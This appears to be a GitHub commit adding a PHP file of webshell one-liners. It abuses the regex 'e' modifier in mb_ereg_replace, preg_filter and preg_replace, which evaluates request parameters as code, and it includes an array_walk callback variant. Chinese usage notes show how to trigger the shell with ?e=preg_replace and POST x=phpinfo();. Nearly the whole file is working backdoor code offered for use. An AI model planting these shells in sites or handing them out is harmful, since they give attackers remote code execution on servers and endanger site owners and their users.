Create 2020.08.20.14.php

1001101100 · Aug 20, 2020 · 6a9169d · 6a9169d
1 parent 44282fe
commit 6a9169d
Showing 1 changed file with 28 additions and 0 deletions.
diff --git a/php/2020.08.20.14.php b/php/2020.08.20.14.php
@@ -0,0 +1,28 @@
+<?php 
+    mb_ereg_replace('\d', $_REQUEST['x'], '1', 'e');
+?>
+
+<?php 
+    preg_filter('|\d|e', $_REQUEST['x'], '2');
+?>
+
+use like:
+
+```
+
+<?php 
+  $e = $_REQUEST['e'];
+  $arr = array($_POST['x'] => '|.*|e',);
+    array_walk($arr, $e, '');
+?>
+此时提交如下 payload 的话：
+
+Php
+shell.php?e=preg_replace
+最后就相当于执行了如下语句：
+
+Php
+preg_replace('|.*|e',$_POST['x'],'')
+这个时候只需要 POST x=phpinfo();
+
+```